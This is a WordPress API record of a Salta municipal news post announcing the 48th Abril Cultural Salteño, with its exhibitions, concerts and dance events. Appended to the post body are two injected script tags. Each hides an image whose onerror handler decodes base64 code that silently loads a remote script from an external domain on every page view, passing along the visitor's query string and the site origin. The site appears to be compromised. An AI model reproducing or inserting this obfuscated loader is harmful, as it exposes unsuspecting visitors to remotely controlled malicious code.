{"id":5009,"date":"2025-04-03T09:04:43","date_gmt":"2025-04-03T12:04:43","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5009"},"modified":"2025-08-13T23:37:30","modified_gmt":"2025-08-14T02:37:30","slug":"el-municipio-te-invita-a-disfrutar-de-las-actividades-del-abril-cultural-salteno","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5009","title":{"rendered":"El municipio te invita a disfrutar de las actividades del Abril Cultural Salte\u00f1o"},"content":{"rendered":"\n<p><strong><em>Se trata de la 48\u00ba edici\u00f3n de este evento que incluye intervenciones art\u00edsticas y musicales. Hoy se oficializ\u00f3 el calendario y el municipio participar\u00e1 con diferentes propuestas gratuitas en el anfi \u201cCuchi\u201d Leguizam\u00f3n, el Teatro del CCM y el Museo de la Ciudad.<\/em><\/strong><\/p>\n\n\n\n<p>La Municipalidad acompa\u00f1a la 48\u00ba edici\u00f3n del Abril Cultural Salte\u00f1o. Es uno de los eventos art\u00edsticos m\u00e1s relevantes de la regi\u00f3n. En esta ocasi\u00f3n, el ciclo tendr\u00e1 como eje tem\u00e1tico la paz, la solidaridad, promoviendo la revalorizaci\u00f3n de los v\u00ednculos entre comunidades de distintos pa\u00edses y su patrimonio cultural.<\/p>\n\n\n\n<p>La organizaci\u00f3n del evento resalta que el arte no solo tiene un valor est\u00e9tico, sino tambi\u00e9n un fuerte compromiso social. Este a\u00f1o, la propuesta busca generar un espacio de reflexi\u00f3n sobre los valores humanos y su importancia en la construcci\u00f3n de una sociedad m\u00e1s inclusiva y respetuosa.<\/p>\n\n\n\n<p>Hoy \u201cPro Cultura Salta\u201d oficializ\u00f3 el calendario en un acto encabezado por su presidente, Roberto Salvatierra, el subsecretario de Cultura, Miguel Dallacamina. Y en representaci\u00f3n del Municipio, la coordinadora de la Agencia de Cultura Activa, Ariana Benavidez.<\/p>\n\n\n\n<p>El evento cont\u00f3 con la participaci\u00f3n de la comunidad brasile\u00f1a, paraguaya y uruguaya, entre otras. Al respecto, la c\u00f3nsul de Brasil en Salta, Cristina Patrocinio, expres\u00f3 su entusiasmo por la participaci\u00f3n de su pa\u00eds en esta edici\u00f3n y resalt\u00f3 la importancia del intercambio cultural.<\/p>\n\n\n\n<p>La actividad inaugural del Abril Cultural tendr\u00e1 por protagonistas al pintor cubano Francisco Cancio Lazo y al curador Mart\u00edn Palomino, quienes inaugurar\u00e1n la muestra \u201cDiaspora 66\u201d en las instalaciones de PRO Cultura Salta, en Mitre 33, este jueves 3 de abril a partir de las 20 hs con entrada libre y gratuita.<\/p>\n\n\n\n<p>Entre las actividades a desarrollarse, en el Museo de la Ciudad el martes 15 de abril a las 19 horas se realizar\u00e1 la apertura de la muestra fotogr\u00e1fica \u201cSobre una mujer\u201d, la visi\u00f3n de los artistas de las am\u00e9ricas. La muestra inaugurada en julio 2023 en el museo de las Am\u00e9ricas- OEA, Washington DC recorre retazos de la vida de diferentes mujeres de distintas nacionalidades, edades, situaci\u00f3n socioecon\u00f3mica, formaci\u00f3n y experiencias.<\/p>\n\n\n\n<p>Podr\u00e1 verse la obra de 33 artistas de 9 pa\u00edses del continente americano. Tambi\u00e9n invita a reflexionar sobre el linaje femenino, las relaciones madres-hijas, la penetraci\u00f3n social de los mandatos heredades, su sumisi\u00f3n, su rebeld\u00eda, su vulnerabilidad y su ferocidad. Sus luchas y conquistas. Dado el \u00e9xito que tuvo en EEUU, el AMA-OEA auspicia su itinerancia por Argentina, comenzando por San Salvador de Jujuy y continuando por Salta. Curadoras: Elda Harrington \/ Silvia Mangialardi<\/p>\n\n\n\n<p>Mientras que en el Teatro Municipal de Avda. Paraguay 1240 tendr\u00e1 lugar el s\u00e1bado 26 un recital musical \u201cAlba\u201d por Alba Arias y \u201cEl canto de la tierra en mi voz\u201d por Luciana Palavecino, a las 19 horas.<\/p>\n\n\n\n<p>Domingo 27, el baile y la m\u00fasica de Bolivia junto a las siguientes morenadas, Uni\u00f3n Comercial \u201cVerdaderos intocables\u201d, \u201cCoraz\u00f3n Real de Urkupi\u00f1a\u201d, \u201cTobas Central\u201d, Fraternidad Morenada del Socav\u00f3n, grupo musical \u201cLocuras\u201d, grupo de Charangueada, , Caporales \u201cRa\u00edces y Herencia\u201d, ballet chapaco, a las 17 horas en el anfiteatro \u201cCuchi\u201d Leguizam\u00f3n del Parque San Mart\u00edn.<\/p>\n\n\n\n<p>Para m\u00e1s informaci\u00f3n pueden consultar el calendario de actividades en proculturasalta.com.ar \u2013 culturasalta.gob.ar. y a trav\u00e9s del siguiente link:&nbsp;<a href=\"https:\/\/proculturasalta.com.ar\/agenda-cultural\/\">https:\/\/proculturasalta.com.ar\/agenda-cultural\/<\/a><\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"5011\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/2abril-cultural-2025-scaled-1-1024x768.webp\" alt=\"\" class=\"wp-image-5011\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/2abril-cultural-2025-scaled-1-1024x768.webp 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/2abril-cultural-2025-scaled-1-300x225.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/2abril-cultural-2025-scaled-1-768x576.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/2abril-cultural-2025-scaled-1-1536x1152.webp 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/2abril-cultural-2025-scaled-1-2048x1536.webp 2048w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/2abril-cultural-2025-scaled-1-560x420.webp 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/2abril-cultural-2025-scaled-1-80x60.webp 80w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/2abril-cultural-2025-scaled-1-696x522.webp 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/2abril-cultural-2025-scaled-1-1068x801.webp 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/2abril-cultural-2025-scaled-1-1920x1440.webp 1920w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/2abril-cultural-2025-scaled-1-265x198.webp 265w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"5010\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/4abril-cultural-2025-jpeg-1024x768.webp\" alt=\"\" class=\"wp-image-5010\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/4abril-cultural-2025-jpeg-1024x768.webp 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/4abril-cultural-2025-jpeg-300x225.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/4abril-cultural-2025-jpeg-768x576.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/4abril-cultural-2025-jpeg-1536x1152.webp 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/4abril-cultural-2025-jpeg-560x420.webp 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/4abril-cultural-2025-jpeg-80x60.webp 80w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/4abril-cultural-2025-jpeg-696x522.webp 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/4abril-cultural-2025-jpeg-1068x801.webp 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/4abril-cultural-2025-jpeg-265x198.webp 265w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/4abril-cultural-2025-jpeg.webp 1600w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"5012\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/5abril-cultural-2025-scaled-1-1024x768.webp\" alt=\"\" class=\"wp-image-5012\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/5abril-cultural-2025-scaled-1-1024x768.webp 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/5abril-cultural-2025-scaled-1-300x225.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/5abril-cultural-2025-scaled-1-768x576.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/5abril-cultural-2025-scaled-1-1536x1152.webp 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/5abril-cultural-2025-scaled-1-2048x1536.webp 2048w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/5abril-cultural-2025-scaled-1-560x420.webp 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/5abril-cultural-2025-scaled-1-80x60.webp 80w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/5abril-cultural-2025-scaled-1-696x522.webp 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/5abril-cultural-2025-scaled-1-1068x801.webp 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/5abril-cultural-2025-scaled-1-1920x1440.webp 1920w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/04\/5abril-cultural-2025-scaled-1-265x198.webp 265w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/prensa.municipalidadsalta.gob.ar\/wp-content\/uploads\/2022\/03\/logo-salta-2024-jpg.webp\" alt=\"\" style=\"width:247px;height:auto\"\/><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se trata de la 48\u00ba edici\u00f3n de este evento que incluye intervenciones art\u00edsticas y musicales. Hoy se oficializ\u00f3 el calendario y el municipio participar\u00e1 con diferentes propuestas gratuitas en el anfi \u201cCuchi\u201d Leguizam\u00f3n, el Teatro del CCM y el Museo de la Ciudad. La Municipalidad acompa\u00f1a la 48\u00ba edici\u00f3n del Abril Cultural Salte\u00f1o. Es uno [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5010,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,17],"tags":[],"class_list":{"0":"post-5009","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5009"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5009"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5009\/revisions"}],"predecessor-version":[{"id":6534,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5009\/revisions\/6534"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5010"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5009"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5009"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5009"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}